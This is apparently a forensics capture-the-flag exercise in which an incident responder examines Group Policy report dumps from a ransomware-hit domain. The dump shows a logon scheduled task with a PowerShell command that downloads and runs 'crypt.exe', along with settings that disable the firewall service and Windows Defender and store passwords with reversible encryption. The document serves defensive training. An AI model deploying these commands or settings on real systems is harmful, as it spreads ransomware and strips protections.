As an incident responder, you have been assigned to investigate a critical situation at Snaplabs.local. The organization has fallen victim to a devastating ransomware attack. In your quest to identify and neutralize the threat, you have obtained the HTML output of a Group Policy Object (GPO) dump. This report holds crucial information that may help in understanding the attack and recovering the compromised systems. Your objective is to meticulously examine the code below, as it contains four hidden flags. By skillfully analyzing the GPO dump, you can uncover these flags and gather valuable insights that will aid in the investigation. Sharpen your forensic skills, and let the pursuit of these flags guide you towards triumph over the ransomware menace. Answers at the bottom.

Default Domain Policy
Group Policy Management
body { font-size:68%;font-family:MS Shell Dlg; margin:0px,0px,0px,0px; border: 1px solid #666666; background:#F6F6F6; width:100%; word-break:normal; word-wrap:break-word; } .head { font-weight:bold; font-size:160%; font-family:MS Shell Dlg; width:100%; color:#6587DC; background:#E3EAF9; border:1px solid #5582D2; padding-left:8px; height:24px; } .path { margin-left: 10px; margin-top: 10px; margin-bottom:5px;width:100%; } .info { padding-left:10px;width:100%; } table { font-size:100%; width:100%; border:1px solid #999999; } th { border-bottom:1px solid #999999; text-align:left; padding-left:10px; height:24px; } td { background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; } .btn { width:100%; text-align:right; margin-top:16px; } .hdr { font-weight:bold; border:1px solid #999999; text-align:left; padding-top: 4px; padding-left:10px; height:24px; margin-bottom:-1px; width:100%; } .bdy { width:100%; height:182px; display:block; overflow:scroll; z-index:2; background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; border:1px solid #999999; } button { width:6.9em; height:2.1em; font-size:100%; font-family:MS Shell Dlg; margin-right:15px; } @media print { .bdy { display:block; overflow:visible; } button { display:none; } .head { color:#000000; background:#FFFFFF; border:1px solid #000000; } }
Setting Path:
Explanation
No explanation is available for this setting.
Supported On:
Not available
Default Domain Policy
Data collected on: 6/13/2023 12:55:39 AM
General
Details
Domainsnaplabs.local
OwnerSNAPLABS\Domain Admins
Created6/30/2021 10:08:04 PM
Modified6/13/2023 12:32:46 AM
User Revisions0 (AD), 0 (SYSVOL)
Computer Revisions23 (AD), 23 (SYSVOL)
Unique ID{31B2F340-016D-11D2-945F-00C04FB984F9}
GPO StatusEnabled
Links
LocationEnforcedLink StatusPath
snaplabsNoEnabledsnaplabs.local

This list only includes links in the domain of the GPO.
Security Filtering
The settings in this GPO can only apply to the following groups, users, and computers:
Name
NT AUTHORITY\Authenticated Users
Delegation
These groups and users have the specified permission for this GPO
NameAllowed PermissionsInherited
NT AUTHORITY\Authenticated UsersRead (from Security Filtering)No
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSReadNo
NT AUTHORITY\SYSTEMEdit settings, delete, modify securityNo
Computer Configuration (Enabled)
Policies
Windows Settings
Security Settings
Account Policies/Password Policy
PolicySetting
Enforce password history24 passwords remembered
Maximum password age42 days
Minimum password age1 days
Minimum password length7 characters
Password must meet complexity requirementsEnabled
Store passwords using reversible encryptionEnabled
Account Policies/Account Lockout Policy
PolicySetting
Account lockout threshold0 invalid logon attempts
Account Policies/Kerberos Policy
PolicySetting
Enforce user logon restrictionsEnabled
Maximum lifetime for service ticket600 minutes
Maximum lifetime for user ticket10 hours
Maximum lifetime for user ticket renewal7 days
Maximum tolerance for computer clock synchronization5 minutes
Local Policies/Security Options
Network Access
PolicySetting
Network access: Allow anonymous SID/Name translationDisabled
Network Security
PolicySetting
Network security: Do not store LAN Manager hash value on next password changeEnabled
Network security: Force logoff when logon hours expireDisabled
Public Key Policies/Encrypting File System
Certificates
Issued ToIssued ByExpiration DateIntended Purposes
AdministratorAdministrator9/13/2121 3:51:08 PMFile Recovery

For additional information about individual settings, launch the Local Group Policy Object Editor.
Preferences
Control Panel Settings
Scheduled Tasks
Scheduled Task (Name: IT startup)
IT startup (Order: 1)
General
ActionCreate
Task
NameIT startup
RunC:\Windows\System32\cmd.exe
Arguments/c powershell -Command "(New-Object System.Net.WebClient).DownloadFile('file://domain/sysvol/crypt.exe', 'C:\Users\Public\crypt.exe'); Start-Process -FilePath 'C:\Users\Public\crypt.exe'"
Scheduled task runs at a specified timeEnabled
Schedule
1. Run at user logon
Settings
Delete the task if it is not scheduled to run againNo
Stop the task if the computer ceases to be idleNo
Do not start the task if the computer is running on batteriesEnabled
Stop the task if battery mode beginsEnabled
Wake the computer to run this taskDisabled
Common
Options
Stop processing items on this extension if an error occurs on this itemNo
Remove this item when it is no longer appliedNo
Apply once and do not reapplyNo
Services
Service (Name: MpsSvc)
MpsSvc (Order: 1)
General
Service nameMpsSvc
ActionStop service
Startup type:Disabled
Wait timeout if service is locked:30 seconds
Service Account
Log on service as:LocalSystem
Allow service to interact with the desktop:Yes
Recovery
First failure:No change
Second failure:No change
Subsequent failures:No change
Common
Options
Stop processing items on this extension if an error occurs on this itemNo
Apply once and do not reapplyNo
User Configuration (Enabled)
No settings defined.
IT test policy
Group Policy Management
body { font-size:68%;font-family:MS Shell Dlg; margin:0px,0px,0px,0px; border: 1px solid #666666; background:#F6F6F6; width:100%; word-break:normal; word-wrap:break-word; } .head { font-weight:bold; font-size:160%; font-family:MS Shell Dlg; width:100%; color:#6587DC; background:#E3EAF9; border:1px solid #5582D2; padding-left:8px; height:24px; } .path { margin-left: 10px; margin-top: 10px; margin-bottom:5px;width:100%; } .info { padding-left:10px;width:100%; } table { font-size:100%; width:100%; border:1px solid #999999; } th { border-bottom:1px solid #999999; text-align:left; padding-left:10px; height:24px; } td { background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; } .btn { width:100%; text-align:right; margin-top:16px; } .hdr { font-weight:bold; border:1px solid #999999; text-align:left; padding-top: 4px; padding-left:10px; height:24px; margin-bottom:-1px; width:100%; } .bdy { width:100%; height:182px; display:block; overflow:scroll; z-index:2; background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; border:1px solid #999999; } button { width:6.9em; height:2.1em; font-size:100%; font-family:MS Shell Dlg; margin-right:15px; } @media print { .bdy { display:block; overflow:visible; } button { display:none; } .head { color:#000000; background:#FFFFFF; border:1px solid #000000; } }
Setting Path:
Explanation
No explanation is available for this setting.
Supported On:
Not available
IT test policy
Data collected on: 6/13/2023 12:55:39 AM
General
Details
Domainsnaplabs.local
OwnerSNAPLABS\Domain Admins
Created6/13/2023 12:04:00 AM
Modified6/13/2023 12:06:42 AM
User Revisions0 (AD), 0 (SYSVOL)
Computer Revisions5 (AD), 5 (SYSVOL)
Unique ID{5BF778F5-BFA2-4961-B493-3079DE9547B4}
GPO StatusEnabled
Links
LocationEnforcedLink StatusPath
snaplabsNoEnabledsnaplabs.local

This list only includes links in the domain of the GPO.
Security Filtering
The settings in this GPO can only apply to the following groups, users, and computers:
Name
NT AUTHORITY\Authenticated Users
Delegation
These groups and users have the specified permission for this GPO
NameAllowed PermissionsInherited
NT AUTHORITY\Authenticated UsersRead (from Security Filtering)No
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSReadNo
NT AUTHORITY\SYSTEMEdit settings, delete, modify securityNo
SNAPLABS\Domain AdminsEdit settings, delete, modify securityNo
SNAPLABS\Enterprise AdminsEdit settings, delete, modify securityNo
Computer Configuration (Enabled)
Policies
Administrative Templates
Policy definitions (ADMX files) retrieved from the local computer.
Windows Components/Windows Defender
PolicySettingComment
Turn off Windows DefenderEnabled
Windows Components/Windows Defender/Real-time Protection
PolicySettingComment
Monitor file and program activity on your computerDisabled
Scan all downloaded files and attachmentsDisabled
Turn off real-time protectionEnabled
Turn on behavior monitoringDisabled
User Configuration (Enabled)
No settings defined.
Default Domain Controllers Policy
Group Policy Management
body { font-size:68%;font-family:MS Shell Dlg; margin:0px,0px,0px,0px; border: 1px solid #666666; background:#F6F6F6; width:100%; word-break:normal; word-wrap:break-word; } .head { font-weight:bold; font-size:160%; font-family:MS Shell Dlg; width:100%; color:#6587DC; background:#E3EAF9; border:1px solid #5582D2; padding-left:8px; height:24px; } .path { margin-left: 10px; margin-top: 10px; margin-bottom:5px;width:100%; } .info { padding-left:10px;width:100%; } table { font-size:100%; width:100%; border:1px solid #999999; } th { border-bottom:1px solid #999999; text-align:left; padding-left:10px; height:24px; } td { background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; } .btn { width:100%; text-align:right; margin-top:16px; } .hdr { font-weight:bold; border:1px solid #999999; text-align:left; padding-top: 4px; padding-left:10px; height:24px; margin-bottom:-1px; width:100%; } .bdy { width:100%; height:182px; display:block; overflow:scroll; z-index:2; background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; border:1px solid #999999; } button { width:6.9em; height:2.1em; font-size:100%; font-family:MS Shell Dlg; margin-right:15px; } @media print { .bdy { display:block; overflow:visible; } button { display:none; } .head { color:#000000; background:#FFFFFF; border:1px solid #000000; } }
Setting Path:
Explanation
No explanation is available for this setting.
Supported On:
Not available
Default Domain Controllers Policy
Data collected on: 6/13/2023 12:55:39 AM
General
Details
Domainsnaplabs.local
OwnerSNAPLABS\Domain Admins
Created6/30/2021 10:08:04 PM
Modified6/30/2021 10:08:04 PM
User Revisions0 (AD), 0 (SYSVOL)
Computer Revisions1 (AD), 1 (SYSVOL)
Unique ID{6AC1786C-016F-11D2-945F-00C04fB984F9}
GPO StatusEnabled
Links
LocationEnforcedLink StatusPath
Domain ControllersNoEnabledsnaplabs.local/Domain Controllers

This list only includes links in the domain of the GPO.
Security Filtering
The settings in this GPO can only apply to the following groups, users, and computers:
Name
NT AUTHORITY\Authenticated Users
Delegation
These groups and users have the specified permission for this GPO
NameAllowed PermissionsInherited
NT AUTHORITY\Authenticated UsersRead (from Security Filtering)No
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSReadNo
NT AUTHORITY\SYSTEMEdit settings, delete, modify securityNo
Computer Configuration (Enabled)
Policies
Windows Settings
Security Settings
Local Policies/User Rights Assignment
PolicySetting
Access this computer from the networkBUILTIN\Pre-Windows 2000 Compatible Access, NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS, NT AUTHORITY\Authenticated Users, BUILTIN\Administrators, Everyone
Add workstations to domainNT AUTHORITY\Authenticated Users
Adjust memory quotas for a processBUILTIN\Administrators, NT AUTHORITY\NETWORK SERVICE, NT AUTHORITY\LOCAL SERVICE
Allow log on locallyNT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS, BUILTIN\Print Operators, BUILTIN\Server Operators, BUILTIN\Account Operators, BUILTIN\Backup Operators, BUILTIN\Administrators
Back up files and directoriesBUILTIN\Server Operators, BUILTIN\Backup Operators, BUILTIN\Administrators
Bypass traverse checkingBUILTIN\Pre-Windows 2000 Compatible Access, NT AUTHORITY\Authenticated Users, BUILTIN\Administrators, NT AUTHORITY\NETWORK SERVICE, NT AUTHORITY\LOCAL SERVICE, Everyone
Change the system timeBUILTIN\Server Operators, BUILTIN\Administrators, NT AUTHORITY\LOCAL SERVICE
Create a pagefileBUILTIN\Administrators
Debug programsBUILTIN\Administrators
Enable computer and user accounts to be trusted for delegationBUILTIN\Administrators
Force shutdown from a remote systemBUILTIN\Server Operators, BUILTIN\Administrators
Generate security auditsNT AUTHORITY\NETWORK SERVICE, NT AUTHORITY\LOCAL SERVICE
Increase scheduling priorityBUILTIN\Administrators
Load and unload device driversBUILTIN\Print Operators, BUILTIN\Administrators
Log on as a batch jobBUILTIN\Performance Log Users, BUILTIN\Backup Operators, BUILTIN\Administrators
Manage auditing and security logBUILTIN\Administrators
Modify firmware environment valuesBUILTIN\Administrators
Profile single processBUILTIN\Administrators
Profile system performanceNT SERVICE\WdiServiceHost, BUILTIN\Administrators
Remove computer from docking stationBUILTIN\Administrators
Replace a process level tokenNT AUTHORITY\NETWORK SERVICE, NT AUTHORITY\LOCAL SERVICE
Restore files and directoriesBUILTIN\Server Operators, BUILTIN\Backup Operators, BUILTIN\Administrators
Shut down the systemBUILTIN\Print Operators, BUILTIN\Server Operators, BUILTIN\Backup Operators, BUILTIN\Administrators
Take ownership of files or other objectsBUILTIN\Administrators
Local Policies/Security Options
Domain Controller
PolicySetting
Domain controller: LDAP server signing requirementsNone
Domain Member
PolicySetting
Domain member: Digitally encrypt or sign secure channel data (always)Enabled
Microsoft Network Server
PolicySetting
Microsoft network server: Digitally sign communications (always)Enabled
Microsoft network server: Digitally sign communications (if client agrees)Enabled
User Configuration (Enabled)
No settings defined.

ANSWERS